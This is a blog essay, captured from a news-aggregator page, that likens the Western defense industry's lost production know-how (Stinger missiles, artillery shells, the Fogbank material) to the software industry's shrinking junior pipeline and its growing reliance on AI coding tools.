Most-winning team in DEF CON CTF his­tory.

The West Forgot How to Build. Now It's Forgetting Code

techtrenches.dev

In 2023, Raytheon’s pres­i­dent stood at the Paris Air Show and de­scribed what it took to restart Stinger mis­sile pro­duc­tion. They brought back en­gi­neers in their 70s to teach younger work­ers how to build a mis­sile from pa­per schemat­ics drawn dur­ing the Carter ad­min­is­tra­tion. Test equip­ment had been sit­ting in ware­houses for years. The nose cone still had to be at­tached by hand, ex­actly as it was forty years ago.

The Pentagon had­n’t bought a new Stinger in twenty years. Then Russia in­vaded Ukraine, and sud­denly every­one needed them. The pro­duc­tion line was shut down. The elec­tron­ics were ob­so­lete. The seeker com­po­nent was out of pro­duc­tion. An or­der placed in May 2022 would­n’t de­liver un­til 2026. Four years. Not be­cause of money. Because the peo­ple who knew how to build them re­tired a decade ear­lier and no­body re­placed them.

I run en­gi­neer­ing teams in Ukraine. My peo­ple lived the other side of this equa­tion. Not the fac­tory floor. The re­ceiv­ing end. While Raytheon was strug­gling to restart pro­duc­tion from forty-year-old blue­prints, the US was ship­ping thou­sands of Stingers to Ukraine. RTX CEO Greg Hayes: ten months of war burned through thir­teen years’ worth of Stinger pro­duc­tion. I’ve seen this pat­tern be­fore. It’s hap­pen­ing in my in­dus­try right now.

In March 2023, the EU promised Ukraine one mil­lion ar­tillery shells within twelve months. European pro­duc­tion ca­pac­ity sat at 230,000 shells per year. Ukraine was con­sum­ing 5,000 to 7,000 rounds per day. Anyone with a cal­cu­la­tor could see this would­n’t work.

By the dead­line, Europe de­liv­ered about half. Macron called the orig­i­nal promise reck­less. An in­ves­ti­ga­tion by eleven me­dia out­lets across nine coun­tries found ac­tual pro­duc­tion ca­pac­ity was roughly one-third of of­fi­cial EU claims. The mil­lion-shell mark was­n’t hit un­til December 2024, nine months late.

It was­n’t one bot­tle­neck. It was all of them. France had halted do­mes­tic pro­pel­lant pro­duc­tion in 2007. Seventeen years of noth­ing. Europe’s sin­gle ma­jor TNT pro­ducer was in Poland. Germany had two days of am­mu­ni­tion stored. A Nammo plant in Denmark was shut down in 2020 and had to be restarted from scratch. The en­tire con­ti­nen­t’s de­fense in­dus­try had been op­ti­mized for mak­ing small batches of ex­pen­sive cus­tom prod­ucts. Nobody planned for vol­ume. Nobody planned for cri­sis.

The U.S. was­n’t much bet­ter. One plant in Scranton, one fa­cil­ity in Iowa for ex­plo­sive fill, no do­mes­tic TNT pro­duc­tion since 1986. Billions of in­vest­ment later, pro­duc­tion still had­n’t hit half the tar­get.

This was­n’t an ac­ci­dent. In 1993, the Pentagon told de­fense CEOs to con­sol­i­date or die. Fifty-one ma­jor de­fense con­trac­tors col­lapsed into five. Tactical mis­sile sup­pli­ers went from thir­teen to three. Shipbuilders from eight to two. The work­force fell from 3.2 mil­lion to 1.1 mil­lion. A 65% cut.

The am­mu­ni­tion sup­ply chain had sin­gle points of fail­ure every­where. One man­u­fac­turer for 155mm shell cas­ings, sit­ting in Coachella, California, on the San Andreas Fault. One fa­cil­ity in Canada for pro­pel­lant charges. Optimized for min­i­mum cost with zero mar­gin for surge. On pa­per, ef­fi­cient. In prac­tice, one bad day away from col­lapse.

Then there’s Fogbank. A clas­si­fied ma­te­r­ial used in nu­clear war­heads. Produced from 1975 to 1989, then the fa­cil­ity was shut down. When the gov­ern­ment needed to re­pro­duce it for a war­head life ex­ten­sion pro­gram, they dis­cov­ered they could­n’t. A GAO re­port found that al­most all staff with pro­duc­tion ex­per­tise had re­tired, died, or left the agency. Few records ex­isted.

After $69 mil­lion in cost over­runs and years of failed at­tempts, they fi­nally pro­duced vi­able Fogbank. Then dis­cov­ered the new batch was too pure. The orig­i­nal process had re­lied on an un­in­ten­tional im­pu­rity that was crit­i­cal to the ma­te­ri­al’s func­tion. Nobody knew. Not the en­gi­neers try­ing to re­pro­duce it. Not even the orig­i­nal work­ers who made it decades ear­lier. Los Alamos called it an un­know­ing de­pen­dency in the orig­i­nal process.

A nu­clear weapons pro­gram lost the abil­ity to make a ma­te­r­ial it in­vented. The knowl­edge did­n’t just leave with peo­ple. It was never fully un­der­stood by any­one.

(Correction: the orig­i­nal ver­sion stated that the work­ers who made Fogbank knew about the im­pu­rity. They did­n’t. The de­pen­dency was un­wit­ting, which makes the knowl­edge-loss ar­gu­ment stronger, not weaker. Thanks to John F. in the com­ments for catch­ing this.)

I read the Fogbank story and rec­og­nized it im­me­di­ately. Not the nu­clear ma­te­r­ial. The pat­tern. Build ca­pa­bil­ity over decades. Find a cheaper sub­sti­tute. Let the hu­man pipeline at­ro­phy. Enjoy the sav­ings. Then watch it all col­lapse when a cri­sis de­mands what you op­ti­mized away.

In de­fense, the sub­sti­tute was the peace div­i­dend. In soft­ware, it’s AI.

I wrote about the tal­ent pipeline col­lapse be­fore. The hir­ing num­bers and the ju­nior-to-se­nior prob­lem are doc­u­mented. So is the com­pre­hen­sion cri­sis. What I did­n’t have was the right his­tor­i­cal par­al­lel. Now I do.

And it tells you some­thing the hir­ing data does­n’t: how long re­build­ing ac­tu­ally takes.

Every ma­jor de­fense pro­duc­tion ramp-up took three to five years for sim­ple sys­tems. Five to ten for com­plex ones. Stinger: thirty months min­i­mum from or­der to de­liv­ery. Javelin: four and a half years to less than dou­ble pro­duc­tion. 155mm shells: four years and still not at tar­get de­spite five bil­lion dol­lars in­vested. France only restarted pro­pel­lant pro­duc­tion in 2024, sev­en­teen years af­ter shut­ting it down.

Money was never the con­straint. Knowledge was. RAND found that 10% of tech­ni­cal skills for sub­ma­rine de­sign need ten years of on-the-job ex­pe­ri­ence to de­velop, some­times fol­low­ing a PhD. Apprenticeships in de­fense trades take two to four years, with five to eight years to reach su­per­vi­sory com­pe­tence.

Now map that onto soft­ware. A ju­nior de­vel­oper needs three to five years to be­come a com­pe­tent mid-level en­gi­neer. Five to eight years to be­come se­nior. Ten or more to be­come a prin­ci­pal or ar­chi­tect. That time­line can’t be com­pressed by throw­ing money at it. It can’t be com­pressed by AI ei­ther.

A METR ran­dom­ized con­trolled trial found that ex­pe­ri­enced de­vel­op­ers us­ing AI cod­ing tools ac­tu­ally took 19% longer on real-world open source tasks. Before start­ing, they pre­dicted AI would make them 24% faster. The gap be­tween pre­dic­tion and re­al­ity was 43 per­cent­age points. When re­searchers tried to run a fol­low-up, a sig­nif­i­cant share of de­vel­op­ers re­fused to par­tic­i­pate if it meant work­ing with­out AI. They could­n’t imag­ine go­ing back.

The soft­ware in­dus­try is in year three of the same op­ti­miza­tion. Salesforce said it won’t hire more soft­ware en­gi­neers in 2025. A LeadDev sur­vey found 54% of en­gi­neer­ing lead­ers be­lieve AI copi­lots will re­duce ju­nior hir­ing long-term. A CRA sur­vey of uni­ver­sity com­put­ing de­part­ments found 62% re­ported de­clin­ing en­roll­ment this year.

I see it in code re­view. Review is now the bot­tle­neck. AI gen­er­ates code fast. Humans re­view it slow. The in­dus­try’s an­swer is pre­dictable: let AI re­view AIs code. I’m not do­ing that. I’ve re­worked our pull re­quest tem­plates in­stead. Every PR now has to ex­plain what changed, why, what type of change it is, screen­shots of be­fore and af­ter. Structured con­text so the re­viewer is­n’t guess­ing. I’m adding ded­i­cated re­view­ers per pro­ject. More eyes, more chances to catch what the model missed.

But even that does­n’t solve the deeper prob­lem. The skills you need to be ef­fec­tive now are dif­fer­ent. Technical ex­per­tise alone is­n’t enough any­more. You need peo­ple who can take own­er­ship, com­mu­ni­cate trade­offs, push back on bad sug­ges­tions from a ma­chine that sounds very con­fi­dent. Leadership qual­i­ties. Our last hir­ing round tells you how rare that is: 2,253 can­di­dates, 2,069 dis­qual­i­fied, 4 hired. A 0.18% con­ver­sion rate. The com­bi­na­tion of tech­ni­cal skill and the judg­ment to know when the AI is wrong barely ex­ists in the mar­ket any­more.

We doc­u­ment every­thing. Site Books, SDDs, RVS re­ports, boil­er­plate mod­ules with full cov­er­age. It works to­day, be­cause the peo­ple read­ing those docs have the en­gi­neer­ing ex­per­tise to act on them. What hap­pens when they don’t? Honestly, I don’t know. Maybe AI in five years is good enough that it won’t mat­ter. Maybe the prob­lem stays man­age­able. I can’t pre­dict the ca­pa­bil­i­ties of mod­els in 2031.

But crises don’t send cal­en­dar in­vites. Nobody ex­pected a full-scale land war in Europe in 2022. The de­fense in­dus­try had thirty years to pre­pare and did­n’t. Even Fogbank had records. There weren’t enough. The orig­i­nal work­ers did­n’t fully un­der­stand their own process.

Five to ten years from now, we’ll need se­nior en­gi­neers. People who un­der­stand sys­tems end to end, who can de­bug dis­trib­uted fail­ures at 2 AM, who carry in­sti­tu­tional knowl­edge that ex­ists nowhere in the code­base. Those en­gi­neers don’t ex­ist yet be­cause we’re not cre­at­ing them. The ju­niors who should be learn­ing right now are ei­ther not be­ing hired or de­vel­op­ing what a DoD-funded work­force study calls AI-mediated com­pe­tence.” They can prompt an AI. They can’t tell you what the AI got wrong.

It’s Fogbank for code. When ju­niors skip de­bug­ging and skip the for­ma­tive mis­takes, they don’t build the tacit ex­per­tise. And when my gen­er­a­tion of en­gi­neers re­tires, that knowl­edge does­n’t trans­fer to the AI.

It just dis­ap­pears.

The West al­ready made this mis­take once. The bill came due in Ukraine.

I know how this sounds. I know I’ve writ­ten about the tal­ent pipeline be­fore. The de­fense ex­am­ple is­n’t about re­peat­ing the ar­gu­ment. It’s about show­ing what hap­pens if the in­dus­try’s ex­pec­ta­tions don’t work out. Stinger, Javelin, Fogbank, a mil­lion shells no­body could make. That’s the cost of bet­ting wrong on op­ti­miza­tion. We’re mak­ing the same bet with soft­ware en­gi­neer­ing right now.

Maybe AI gets good enough, and the bet pays off. Maybe it does­n’t. The de­fense in­dus­try thought peace would last for­ever, too.

No posts

Just a moment...

neal.fun

To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".

10HN is also available as an iOS App

If you visit 10HN only rarely, check out the the best articles from the past week.

If you like 10HN please leave feedback and share

Visit pancik.com for more.